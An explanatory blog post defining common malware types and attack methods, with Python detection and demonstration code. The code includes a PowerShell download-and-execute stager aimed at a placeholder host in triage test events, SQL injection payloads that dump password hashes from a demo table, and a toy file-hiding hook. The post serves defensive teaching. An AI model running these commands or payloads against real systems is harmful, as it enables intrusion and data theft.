The 16 Major Types of Malware – Defined
Malware is a constant threat to information security. As attacker tooling and tactics advance, malicious software has become a significant risk for any business’s online infrastructure, and understanding the different categories is essential for the IT specialists and security professionals defending against it. This post gives an overview of 16 common types of malware and of the attack techniques most often used to deliver or accompany it. Several entries below (phishing, DDoS, SQL injection, cross-site scripting, man-in-the-middle and password attacks) are attack methods rather than malware families in the strict sense, but they are how malware usually arrives or what it is used for, so they belong in the same picture. Each comes with a brief description to help you recognise it and address the threat.
- Phishing
What is it?
Phishing attacks are fraudulent emails, text messages, phone calls, or websites designed to manipulate people into downloading malware, sharing sensitive information, or taking other actions that expose themselves or their organizations to cybercrime.
How does it work?
Bulk email phishing is the most common form. A scammer crafts an email that appears to come from a large, well-known organisation and sends it to millions of recipients. A victim who clicks the malicious link or opens the attachment either lands on a credential-harvesting page that mimics the real site or downloads malware onto their computer.
What types are there?
Bulk (spam) phishing, spear phishing, whaling, barrel phishing, vishing, smishing and trap phishing.
What impact is it having on businesses?
- Unit 42’s recent survey found that 77% of intrusions are suspected to be caused by three initial access vectors: phishing, exploitation of known software vulnerabilities, and brute-force credential attacks focused primarily on Remote Desktop Protocol.
- Despite being one of the oldest tactics, phishing remains an effective way for cybercriminals to get into organisations. Even though these attacks keep working, many enterprise risk management (ERM) and cybersecurity programmes still give phishing detection and mitigation less priority than they deserve.
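The look-alike domains described above (a brand with one letter changed, digits swapped for letters, or the real brand name placed in front of an attacker-controlled domain) can be caught mechanically before a user ever sees the link. The following Python is an added example, not code from the original post; the protected-brand list is constructed for the demonstration (it reuses the goodwebsite.com / goodwobsite.com pair from the password-attack section further down), and the assumption that every registrable domain is the last two labels is a simplification that production code should replace with a public-suffix list.

```python
import unicodedata
from urllib.parse import urlsplit

# Brands this organisation wants to protect (constructed list for this example).
PROTECTED_DOMAINS = {"goodwebsite.com", "examplebank.com"}

# Digits attackers substitute for look-alike letters; 'rn' -> 'm' is handled separately.
HOMOGLYPHS = str.maketrans("01358", "olesb")


def hostname(url: str) -> str:
    """Extract the host from a URL or bare domain; NFKC-fold and lower-case it."""
    if "//" not in url:
        url = "//" + url
    host = urlsplit(url).hostname or ""
    return unicodedata.normalize("NFKC", host).lower().rstrip(".")


def normalise(label: str) -> str:
    """Collapse common homoglyph tricks so 'g00dwebsite' compares equal to 'goodwebsite'."""
    return label.translate(HOMOGLYPHS).replace("rn", "m").replace("-", "")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; a one-letter typo-squat (goodwobsite) is distance 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str) -> str:
    """Return 'legitimate', 'unrelated', or the kind of impersonation and the brand it targets."""
    labels = hostname(url).split(".")
    if len(labels) < 2:
        return "unrelated"
    # Assumption: registrable domain = last two labels (use a public-suffix list in production).
    registered = ".".join(labels[-2:])
    if registered in PROTECTED_DOMAINS:
        return "legitimate"
    for brand in sorted(PROTECTED_DOMAINS):
        name = brand.split(".")[0]
        if name in labels[:-2]:  # goodwebsite.com.account-verify.net
            return f"brand-as-subdomain: {brand}"
        # goodwobsite.com (typo), g00dwebsite.com (homoglyph), goodwebsite.co (TLD swap)
        if edit_distance(normalise(labels[-2]), name) <= 1:
            return f"lookalike: {brand}"
    return "unrelated"


if __name__ == "__main__":
    for u in ("https://goodwebsite.com/reset", "https://goodwobsite.com/reset",
              "http://g00dwebsite.com/login", "https://goodwebsite.com.account-verify.net/",
              "https://www.python.org/"):
        print(f"{u:50} {classify(u)}")
```

Run as a mail-gateway or proxy hook, anything other than "legitimate" or "unrelated" is worth a warning banner or a block. Internationalised domain names arrive as punycode (`xn--…`) and need decoding before the homoglyph step; that is left out here.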
- Vishing
What is it?
Vishing usually arrives as a phone call that sounds urgent or alarming: an unsolicited caller tells you your bank account has been compromised and that they need your PIN to verify your identity or unlock the account. The term combines “voice” and “phishing” and describes scams carried out over mobile or landline phones.
How Does it Work?
Vishing is especially insidious because the callers often spoof caller ID so the call appears to come from a bank or government agency, and use threatening language to convince people they face serious trouble (including legal action or arrest) if they do not follow instructions. Urgency and authority are the levers; the goal is to get the victim to read out a PIN, a one-time passcode or a card number, or to move money themselves.
What types are there?
There are almost endless variations. Callers pretend to be from your bank to obtain account details, or from the IRS to collect “unpaid taxes”. Enrollment scams involve criminals posing as representatives of government programmes such as the Social Security Administration or Medicare and harvesting personal or financial information under the guise of helping you enroll or receive payments.
- DoS/DDoS Attack
What is it?
A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the regular traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. From a high level, a DDoS attack is like an unexpected traffic jam clogging up the highway, preventing regular traffic from arriving at its destination.
How does it work?
DDoS attacks are carried out with networks of Internet-connected machines. These networks consist of computers and other devices, such as IoT devices, that have been infected with malware allowing an attacker to control them remotely. The individual devices are referred to as bots (or zombies), and a group of bots is called a botnet. On command they send traffic or requests to the victim, exhausting its bandwidth, connection tables or application capacity so that legitimate requests such as customer orders, shipping updates, and email and chat communication are dropped.
What types are there?
A denial-of-service (DoS) attack floods a server with traffic from a single source, making a website or resource unavailable. A distributed denial-of-service (DDoS) attack uses many machines to flood the target, which makes it far harder to block by source. By technique, DDoS attacks are usually grouped into volumetric floods (saturating bandwidth), protocol attacks (exhausting connection state on servers, firewalls or load balancers, for example SYN floods) and application-layer attacks (expensive HTTP requests that look like real users).
What impact is it having on businesses?
Distributed denial of service (DDoS) attacks are now an everyday occurrence and are expected to keep increasing in number and complexity as botnets and inexpensive DDoS-for-hire services proliferate. One of the most significant factors in the 2020 DDoS attacks was the COVID-19 lockdown, which drove a rapid shift online for everything from education and healthcare to consumer shopping and office work, giving attackers more targets than ever.
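The difference between a single-source flood and a botnet flood shows up directly in access logs: one IP far above its normal rate versus many IPs each at an innocuous rate whose sum overwhelms the site. The Python below is an added example, not code from the original post. It slides a ten-second window over a constructed log (the `<ip> <epoch-second> <method> <path>` format and all traffic in it are synthetic) and reports both patterns; the thresholds are illustrative assumptions to be tuned to a real baseline.

```python
from collections import Counter, defaultdict

WINDOW = 10            # sliding window, seconds (assumed)
PER_SOURCE_LIMIT = 50  # requests per window from one IP before it counts as a flood (assumed)
GLOBAL_LIMIT = 400     # requests per window site-wide before capacity is at risk (assumed)


def analyse(lines, window=WINDOW, per_source_limit=PER_SOURCE_LIMIT, global_limit=GLOBAL_LIMIT):
    """Bucket requests per second, then slide a window over the timeline.

    One IP above per_source_limit is a plain DoS flood (block the IP).
    The site-wide total above global_limit with no single IP standing out is the
    DDoS signature: many low-rate sources whose sum exhausts capacity.
    """
    by_sec = defaultdict(Counter)  # second -> Counter(ip -> requests)
    for line in lines:
        ip, ts, _method, _path = line.split()
        by_sec[int(ts)][ip] += 1

    single_source, distributed = set(), []
    for t in sorted(by_sec):
        win = Counter()
        for s in range(t - window + 1, t + 1):
            win.update(by_sec.get(s, {}))
        total = sum(win.values())
        hot = {ip for ip, n in win.items() if n > per_source_limit}
        single_source |= hot
        if total > global_limit and not hot:
            distributed.append((t, total, len(win)))  # (second, requests, distinct sources)

    peak = max(distributed, key=lambda w: w[1], default=None)
    return {"single_source": sorted(single_source),
            "distributed_windows": len(distributed),
            "peak": peak}


def constructed_traffic():
    """Synthetic access log lines (constructed, not real data)."""
    lines = []
    legit = [f"192.0.2.{i}" for i in range(1, 6)]
    for t in range(60):                              # baseline: 5 users, 1 request/s each
        lines += [f"{ip} {t} GET /" for ip in legit]
    for t in range(20, 30):                          # one host hammering search at 20 req/s
        lines += [f"198.51.100.9 {t} GET /api/search"] * 20
    for t in range(40, 50):                          # 100 bots, 1 req/s each, aimed at login
        lines += [f"203.0.113.{i} {t} POST /api/login" for i in range(100)]
    return lines


if __name__ == "__main__":
    print(analyse(constructed_traffic()))
```

The per-source rule alone misses the botnet entirely (every bot stays under 50 requests per window), which is exactly why DDoS mitigation leans on aggregate capacity signals, upstream scrubbing and behavioural fingerprints rather than on blocking individual addresses.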
- Adware
What is it?
Adware is a type of software that automatically displays or downloads advertising content, such as banners or pop-ups, on a user’s device, often without their consent. Adware generates revenue for its developers through advertising, and it can be intrusive and negatively impact user experience.
How does it work?
Adware is typically bundled with free software or delivered through malicious websites or email attachments. Once installed, it monitors user behaviour, displays targeted ads, and may collect personal data or change browser settings such as the home page and default search provider.
What types are there?
Legitimate adware: This is included with free software or services as a means for developers to generate revenue. Users are typically informed of its presence, and it can be uninstalled.
Malicious adware: This type of adware is installed without user consent and may have harmful effects, such as stealing sensitive information or redirecting users to phishing websites.
What impact is it having on businesses?
Adware impacts businesses in several ways. Loss of productivity can occur as intrusive ads distract employees and slow down their work. Security risks are also a concern, as malicious adware may steal sensitive data or lead to more severe cyberattacks. In addition, adware infections can damage a company’s reputation, causing customers to lose trust in its ability to protect their data. Finally, businesses may face financial costs as they must invest in cybersecurity measures and employee training to combat adware and its consequences.
- Ransomware
What is it?
Ransomware is a type of malicious software (malware) designed to encrypt a victim’s data, rendering it inaccessible until a ransom is paid to the attacker for a decryption key.
How does it work?
Ransomware typically enters a system through phishing emails, infected software downloads or exposed remote-access services with weak credentials, then encrypts the target’s files. Many current groups also steal data before encrypting it and threaten to publish it (“double extortion”). The attacker then demands a ransom, usually in cryptocurrency, in exchange for the decryption key.
What types are there?
Crypto Ransomware or Encryptors, Lockers, Scareware, Doxware or Leakware, RaaS (Ransomware as a Service)
What impact is it having on businesses?
The impact on businesses includes financial losses from ransom payments, downtime, critical data loss, reputational damage, and potential legal liabilities. It also forces companies to invest more in cybersecurity measures to prevent future attacks.
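Encryption leaves a measurable fingerprint: ciphertext has near-maximum byte entropy and no recognisable file header, and ransomware usually renames files as it goes. The Python below is an added example, not code from the original post. It scores a set of constructed in-memory files (the document contents, the pseudo-random stand-in for ciphertext and the 7.5 bits-per-byte threshold are all assumptions for the demonstration) and separates legitimately high-entropy formats such as PNG or DOCX, which keep their headers, from files that have been encrypted in place or renamed.

```python
import hashlib
import math
from collections import Counter

HIGH_ENTROPY = 7.5  # bits/byte; encrypted or well-compressed data sits near 8.0 (assumed cut-off)

# Expected file headers for the types this example knows about.
MAGIC = {
    b"%PDF": {"pdf"},
    b"PK\x03\x04": {"docx", "xlsx", "pptx", "zip"},
    b"\x89PNG\r\n\x1a\n": {"png"},
}
KNOWN_EXT = {"txt", "csv", "log"} | set().union(*MAGIC.values())


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_file(name: str, data: bytes) -> str:
    ext = name.rsplit(".", 1)[-1].lower()
    header_ok = any(data.startswith(m) for m, exts in MAGIC.items() if ext in exts)
    if shannon_entropy(data) < HIGH_ENTROPY:
        return "plain"
    if header_ok:
        return "compressed-format"    # high entropy is normal for zip-based and image formats
    if ext in KNOWN_EXT:
        return "encrypted-in-place"   # claims a known type, header gone, random bytes
    return "encrypted-renamed"        # unknown or appended extension, random bytes


def pseudo_random(n: int, seed: bytes) -> bytes:
    """Deterministic high-entropy bytes standing in for ciphertext (constructed)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


SAMPLE_FILES = {  # constructed stand-ins for a user's documents folder
    "notes.txt": b"Quarterly notes: revenue up, costs flat, hiring paused.\n" * 60,
    "photo.png": b"\x89PNG\r\n\x1a\n" + pseudo_random(4096, b"png"),
    "invoice.docx": b"PK\x03\x04" + pseudo_random(4096, b"docx"),
    "report.pdf": pseudo_random(4096, b"enc1"),          # encrypted, name kept
    "budget.xlsx.locked": pseudo_random(4096, b"enc2"),  # encrypted, extension appended
}


def scan(files: dict) -> dict:
    labels = {name: classify_file(name, data) for name, data in files.items()}
    flagged = sorted(n for n, label in labels.items() if label.startswith("encrypted"))
    return {"labels": labels, "flagged": flagged}


if __name__ == "__main__":
    for name, label in scan(SAMPLE_FILES)["labels"].items():
        print(f"{name:22} {label}")
```

A real monitor would run this on file-write events rather than a static folder and alert on the rate of `encrypted-*` results (many documents changing within seconds, from one process), because a handful of legitimately encrypted archives is normal while a burst of them is not.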
- Fileless Malware
What is it?
Fileless malware is malicious software that avoids writing its own executable to disk. Instead it runs in system memory and lives in legitimate system components (registry keys, WMI subscriptions, scheduled tasks, scripts passed on a command line), which makes it hard to detect with traditional file-scanning antivirus. “Fileless” does not mean trace-free: the command lines, registry entries and in-memory artefacts it leaves behind are exactly what detection should look for.
How does it work?
Fileless malware typically uses legitimate tools and processes already present in the system, such as PowerShell, Windows Management Instrumentation (WMI), or macros in documents, to carry out its malicious activities. This makes it challenging to detect and block, as it can blend in with normal system activities.
What types are there?
Memory-based fileless malware, Script-based fileless malware, Macro-based fileless malware
What impact is it having on businesses?
Fileless techniques have had a significant impact on businesses; the Emotet loader is a well-known example. Emotet arrives via email attachments or links; a document macro launches PowerShell, which downloads and runs the next stage in memory before the final payload is spread across the network. This has led to widespread financial losses, data breaches and disruption of business operations. Banking Trojans such as Dridex have used the same macro-to-script delivery and other living-off-the-land tools to evade detection and steal credentials, leading to financial fraud and reputational damage for targeted businesses.
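Because the macro-to-PowerShell chain described above leaves no payload on disk, the detection point is the process-creation event: the parent process, the PowerShell switches and, when `-EncodedCommand` is used, the base64-encoded UTF-16LE script itself. The Python below is an added example, not code from the original post or any vendor’s detection rule. It decodes encoded commands, scores constructed process events against a small rule set, and weights an Office parent heavily; the rules, weights and sample events are assumptions for the demonstration, and the download URL uses the reserved `.invalid` TLD.

```python
import base64
import re

# (regex, finding name, weight); patterns are illustrative, not an exhaustive rule set.
RULES = [
    (r"\biex\b|invoke-expression", "invoke-expression", 3),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", "web-download", 3),
    (r"frombase64string", "inline-base64", 2),
    (r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass",
     "evasion-switches", 1),
    (r"win32_process|invoke-wmimethod|invoke-cimmethod|wmic\s+.*process\s+call\s+create",
     "wmi-exec", 2),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e, -ec, -enc and -EncodedCommand all accept a base64 blob of UTF-16LE script text.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script behind an -EncodedCommand switch, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict) -> dict:
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    findings, points = [], 0
    if decoded is not None:
        findings.append("encoded-command")
        points += 2
        cmdline = f"{cmdline} {decoded}"  # scan the decoded script as well as the raw line
    for pattern, name, weight in RULES:
        if re.search(pattern, cmdline, re.I):
            findings.append(name)
            points += weight
    if event["parent"].lower() in OFFICE_PARENTS:
        findings.append("office-parent")  # document macro spawning a shell: the Emotet/Dridex chain
        points += 3
    severity = "high" if points >= 8 else "medium" if points >= 4 else "low" if points else "benign"
    return {"severity": severity, "points": points, "findings": findings, "decoded": decoded}


def triage(events):
    return [score_event(e) for e in events]


def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

SAMPLE_EVENTS = [  # constructed process-creation events: parent image and command line
    {"parent": "winword.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {_encode(STAGER)}"},
    {"parent": "explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent": "cmd.exe",
     "cmdline": f'wmic process call create "powershell -nop -c {STAGER}"'},
    {"parent": "explorer.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users"},
]

if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(res["severity"], res["points"], res["findings"], "<-", ev["parent"])
```

The second event (an admin running a script with `-ExecutionPolicy Bypass`) scores low rather than benign on purpose: the switch is suspicious in combination, not on its own, and scoring rather than single-indicator matching is what keeps this kind of rule usable in an environment where PowerShell is legitimately everywhere.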
- Spyware
What is it?
Spyware is a type of malicious software that is designed to infiltrate a device or system without the user’s knowledge or consent. It is typically installed on a device covertly and gathers information about the user’s online activities, including websites visited, passwords entered, and personal data such as credit card numbers and browsing habits. This information is then transmitted to a remote server where it can be used for nefarious purposes.
How does it work?
Spyware can be installed through various methods, including email attachments, infected USB drives, and malicious websites. It can also be bundled with legitimate software or disguised as a legitimate application. Once installed, spyware operates in the background, silently collecting data without the user’s awareness. It can also have the ability to capture screenshots, record keystrokes, intercept communications, and even activate cameras and microphones to monitor the user’s activities.
What types are there?
Several kinds of spyware are commonly distinguished, including keyloggers, adware, trojan horses and tracking cookies (adware and Trojans have their own sections on this page; the categories overlap). Keyloggers record keystrokes, allowing the attacker to capture sensitive information such as passwords and credit card numbers. Adware displays unwanted advertisements, often redirecting users to malicious websites. Trojan horses disguise themselves as legitimate software or files, allowing the attacker to gain unauthorized access to a system. Tracking cookies collect data about the user’s browsing activities and send it to remote servers for targeted advertising or other purposes.
What impact is it having on businesses?
Spyware can have severe impacts on businesses. It can result in the theft of sensitive business data, such as trade secrets, intellectual property, and customer information, which can lead to financial loss, reputational damage, and legal liabilities. Spyware can also disrupt business operations by causing system slowdowns, crashes, and other technical issues. Additionally, businesses may face regulatory fines and penalties for failing to protect customer data from spyware attacks. It is crucial for businesses to implement robust cybersecurity measures, including anti-spyware software, employee training, and regular security audits, to mitigate the risks posed by spyware.
- Trojan
What is it?
Trojan malware, commonly known as a Trojan or a Trojan horse, is a type of malicious software that appears to be legitimate and benign but is designed to deceive users and gain unauthorized access to their systems or steal sensitive information.
How does it work?
Trojans typically disguise themselves as harmless files or programs, such as attachments in emails or software downloads, and trick users into executing or installing them. Once installed, Trojans can perform various malicious activities, such as stealing personal data, logging keystrokes, taking control of the victim’s computer, launching distributed denial-of-service (DDoS) attacks, or installing other malware.
What types are there?
Remote Access Trojans (RATs), Keyloggers, Banking Trojans, DDoS Trojans
What impact is it having on businesses?
Trojans such as Emotet and TrickBot have been used to gain unauthorised access to business systems, steal credentials and sensitive data, and install follow-on ransomware, leading to data breaches. Emotet was so prolific in 2020 that it was widely regarded as one of the most dangerous malware families of the period, affecting government agencies, financial institutions and healthcare organisations and causing financial losses and reputational damage; its infrastructure was taken down by an international law-enforcement operation in January 2021.
- Worms
What is it?
Worms are self-replicating malicious programs that spread across networks or the internet without any human intervention. They exploit vulnerabilities in computer systems and can harm both the infected hosts and the networks they traverse.
How does it work?
Worms typically infiltrate a system by exploiting security weaknesses such as unpatched software, exposed services or weak passwords. Once inside, they replicate and spread autonomously to other systems, often over email, instant messaging, network shares or vulnerable network services. Worms can also carry payloads, which may steal data, destroy files or create backdoors for future attacks.
What types are there?
Worms are commonly grouped by how they spread: email worms, network worms and internet worms.
What impact is it having on businesses?
Worms continue to pose significant threats to businesses, and recent examples show their damaging impact. The NotPetya worm, which emerged in June 2017, caused widespread disruption and financial losses for global companies including Maersk, Merck and FedEx (through its TNT Express subsidiary). NotPetya spread with the EternalBlue exploit for the Windows SMBv1 vulnerability (MS17-010) and by harvesting credentials from memory and reusing them with PsExec and WMI, so fully patched machines were infected too once one host on the network fell. Although it demanded a ransom, its encryption was effectively irreversible, which is why it is classified as a wiper disguised as ransomware; the result was massive business interruption and financial damage.
- Virus
What is it?
A virus is malicious code that attaches itself to a legitimate program or file and runs when that host is executed, modifying other programs to insert copies of itself. Once on a network it can be used for various malicious purposes, such as stealing sensitive data, adding the machine to a botnet used for Distributed Denial of Service (DDoS) attacks, or dropping ransomware.
How does it work?
Unlike a worm, a virus needs a host and usually a user action to spread: someone runs an infected program, opens an infected document or boots from an infected disk. Once running, it copies itself into other files or boot sectors, often without the user’s knowledge or consent, and can carry out malicious activities such as deleting files, stealing passwords, intercepting communications or other harmful actions.
What types are there?
Viruses are classified by what they infect and how they hide: boot-sector viruses, file-infecting viruses, macro viruses, memory-resident viruses, and polymorphic or metamorphic viruses that change their own code to evade signature scanning. (Worms, Trojans, ransomware, spyware and botnets are separate categories of malware and are covered in their own sections.)
What impact is it having on businesses?
The impact of virus infections on businesses can be severe, resulting in financial losses, reputational damage, legal and regulatory consequences, operational disruptions and high remediation costs. The 2021 attack on Colonial Pipeline, a major US fuel pipeline operator, is often cited here, although strictly it was ransomware (DarkSide) rather than a self-replicating virus: it led to a temporary shutdown of pipeline operations, a ransom payment of roughly 4.4 million dollars (part of which the US Department of Justice later recovered) and significant operational disruption. It illustrates the need for robust cybersecurity measures against malware of every kind.
- Rootkits
What is it?
A rootkit is malicious software whose primary job is to hide: it conceals its own presence and that of other malware (keyloggers, backdoors) from the operating system and security tools, typically while running with administrative or kernel-level privileges and often giving the attacker covert remote control of the machine. Rootkits can be injected into various layers of a system, including applications, the kernel, hypervisors or firmware. They are distributed through phishing, malicious attachments, downloads or compromised shared drives, usually as one component of a larger toolkit, which makes them a potent tool for cybercriminals.
How does it work?
Rootkits work by modifying or replacing system files, processes, or components in order to hide their presence and gain elevated privileges on a system. They can intercept system calls and manipulate system data to control system behavior and evade detection by antivirus or security software. Rootkits often operate at the kernel level, which gives them deep access to the operating system and allows them to hide their presence from regular system monitoring tools.
What types are there?
Hardware or firmware rootkit, Bootloader rootkit, Memory rootkit, Application rootkit, Kernel mode rootkits
What impact is it having on businesses?
The impact of rootkits on businesses can be severe, resulting in significant financial and reputational damage. The SolarWinds supply-chain attack of 2020 is often cited in this context; strictly, the SUNBURST implant was a backdoor trojanised into signed Orion software updates rather than a rootkit, but it shared the rootkit’s defining goal of long-term stealth (it lay dormant for about two weeks after installation, disguised its traffic as legitimate Orion telemetry and stood down when it detected security tools). It led to breaches at numerous organisations, including US government agencies and Fortune 500 companies, caused financial and reputational damage, and highlighted the need for measures that can detect deeply embedded, stealthy code.
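The hooking technique described above, and the cross-view comparison that detects it, can be shown in miniature in user space. The Python below is an added example, not code from the original post: it replaces `os.listdir` with a filtering wrapper that hides files with a constructed `.rk_` prefix, then detects the hiding by comparing that API’s view with an independent enumeration through `os.scandir`. The file names and the prefix convention are assumptions for the demonstration, and the hook is installed only for the duration of `demo()`.

```python
import os
import pathlib
import tempfile

HIDDEN_PREFIX = ".rk_"          # names the toy "rootkit" hides (constructed convention)
_original_listdir = os.listdir  # saved so the hook can be removed again


def hooked_listdir(path="."):
    """Stand-in for a hooked directory-listing API: filters the implant's files out of the result."""
    return [n for n in _original_listdir(path) if not n.startswith(HIDDEN_PREFIX)]


def install_hook():
    os.listdir = hooked_listdir


def remove_hook():
    os.listdir = _original_listdir


def hook_installed() -> bool:
    return os.listdir is hooked_listdir


def cross_view_diff(path) -> list:
    """Cross-view detection: compare the API a rootkit is likely to hook with an
    independent enumeration path and report entries that only the latter sees."""
    high_level = set(os.listdir(path))
    low_level = {entry.name for entry in os.scandir(path)}
    return sorted(low_level - high_level)


def demo():
    """Create a visible file and a 'hidden' one, hook, list, detect, unhook."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("report.txt", HIDDEN_PREFIX + "implant.bin"):
            pathlib.Path(d, name).write_bytes(b"x")
        install_hook()
        try:
            visible = sorted(os.listdir(d))   # what a hooked tool shows the user
            hidden = cross_view_diff(d)       # what the cross-view check recovers
        finally:
            remove_hook()
    return visible, hidden


if __name__ == "__main__":
    shown, concealed = demo()
    print("listing shows:", shown)
    print("cross-view reveals:", concealed)
```

The limitation is the same one real rootkit scanners face: a kernel-mode rootkit hooks below both of these calls, so both views are filtered and the diff is empty. Cross-view tools therefore compare the live operating system against a view it cannot influence, such as a raw parse of the volume or an offline scan of the disk image.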
- Malware Attacks
What is it?
“Malware attack” is an umbrella term covering any attack in which malicious software executes unauthorised actions on a victim’s system. In everyday usage “cyber attack” and “malware attack” are often treated as synonyms, although some attacks (credential theft, denial of service, injection attacks against web applications) involve no malware at all. Malware, short for malicious software, encompasses many specific families such as ransomware, spyware, Trojans, worms and viruses (a virus is one kind of malware, not a synonym for it), together with the command-and-control infrastructure used to operate them.
How Does it Work?
Malware discussion typically encompasses three main aspects:
- Objective: What the malware is designed to achieve
- Delivery: How the malware is delivered to the target
- Concealment: How the malware avoids detection (the rootkit and fileless-malware sections above describe the main techniques)
What Types Are There?
The types are almost endless: any attack that delivers malicious programs or code to a victim system counts, whether directly, through a malicious attachment, or via a link to a site that serves the program automatically. Malware attacks include ransomware, Trojans, worms, spyware, adware and many more.
What impact is it having on businesses?
Because “malware attack” is an umbrella term, its impact is the sum of the impacts described in the individual sections: ransomware alone brings downtime, data loss and ransom costs, while Trojans and spyware lead to breaches and fraud.
- SQL Injection
What is it?
SQL injection (SQLi) is an attack on an application that builds database queries from untrusted input: the attacker supplies input containing SQL syntax, the application passes it to the database as part of its own query, and the attacker can read or modify data they should never reach. SQLi attacks often target confidential information in a database such as customer PII. Depending on the database and its configuration, some variants give criminals control of the database server or the underlying host, allowing them to change, delete or exfiltrate data.
How Does it Work?
SQL (Structured Query Language) is the language applications use to talk to a relational database management system. SQL statements retrieve, update and delete records. When an application concatenates user input into the text of a statement instead of passing it as a bound parameter, an attacker can put quotes, operators and extra clauses into that input, and the database server executes commands the developer never wrote.
What Types Are There?
In-band SQLi (union-based and error-based, where results come back in the application’s own response), inferential or blind SQLi (Boolean-based and time-based, where the attacker infers data from the application’s behaviour or response time, often one bit at a time), and out-of-band SQLi (results exfiltrated over a separate channel such as DNS). All of them exploit the same flaw in the web application: untrusted input becoming part of a query.
What impact is it having on businesses?
Because databases hold personal customer data, credentials and proprietary company data, a successful injection usually means a reportable data breach: exfiltrated records, regulatory fines, breach-notification costs and reputational damage. Where the attacker can modify or delete data, it can also mean corrupted orders, fraudulent transactions or an application outage.
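The mechanism described above is easiest to see with a concatenated query next to its parameterised replacement. The Python below is an added example, not code from the original post; it uses the standard-library `sqlite3` module with an in-memory table of constructed users (the password hashes are placeholder strings) and runs the same two attacker inputs through both versions of the lookup.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows; hashes are placeholders, not real digests."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, email, password_hash) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "pbkdf2$a1b2"),
         ("bob", "bob@example.com", "pbkdf2$c3d4"),
         ("carol", "carol@example.com", "pbkdf2$e5f6")],
    )
    return conn


def find_user_vulnerable(conn, username: str):
    # Input is spliced into the statement text, so a quote in it becomes SQL syntax.
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, username: str):
    # Bound parameter: the value travels separately from the statement and cannot change its shape.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


# Two classic payloads: a tautology that matches every row, and a UNION that pulls
# a different column (the password hashes) into the result set.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT username, password_hash FROM users--"


if __name__ == "__main__":
    conn = make_db()
    for payload in (TAUTOLOGY, UNION_DUMP):
        print("vulnerable:", find_user_vulnerable(conn, payload))
        print("safe      :", find_user_safe(conn, payload))
```

Note what the safe version does with the payload: it searches for a user literally named `' OR '1'='1` and finds nobody. Escaping quotes by hand, allow-listing characters or the single-statement restriction that `sqlite3.Cursor.execute` happens to enforce are not substitutes; the parameter binding is what removes the vulnerability class.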
- Man-in-the-Middle Attack (MitM)
What is it?
It is a cyberattack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other, as the attacker has inserted themselves between the two parties.
How Does it Work?
A classic setting is an attacker within range of an unencrypted Wi-Fi access point, or one who runs a rogue access point or has poisoned ARP or DNS on a local network, placing themselves between a user and the service. Because a MITM attack must circumvent mutual authentication, it succeeds only when the attacker impersonates each endpoint well enough to satisfy the other; properly validated TLS certificates are the main reason it fails against modern HTTPS.
What Types Are There?
There are quite a few types of MITM attacks, including the following:
- Eavesdropping: the attacker runs a packet sniffer on a network they control or share and harvests credentials and data from unencrypted traffic.
- Spoofing and redirection: ARP spoofing, DNS spoofing or a rogue Wi-Fi hotspot routes the victim’s traffic through the attacker’s machine.
- Fake-site interception: when a user logs in, the attacker captures the credentials on a site that mimics the real one and can immediately use them on the genuine site to reach the target’s information.
- Downgrade and certificate attacks: stripping HTTPS down to HTTP or presenting a forged certificate so the victim’s connection can be read or altered.
What impact is it having on businesses?
In a banking scenario, an attacker could see that a user is making a transfer and change the destination account number or amount being sent. Threat actors could use man-in-the-middle attacks to harvest personal information or login credentials.
- Cross-Site Scripting
What is it?
A cross-site scripting attack occurs when cybercriminals inject malicious scripts into the targeted website’s content, which is then included with dynamic content delivered to a victim’s browser. The victim’s browser has no way of knowing that the malicious scripts can’t be trusted and therefore executes them.
How Does it Work?
Malicious scripts run in the victim’s browser with the privileges of the site: they can read cookies, session tokens and other sensitive information the browser holds for that origin, and make requests on the user’s behalf. Attackers also use XSS to deliver malware, rewrite page contents, and build self-propagating worms on social networks.
What Types Are There?
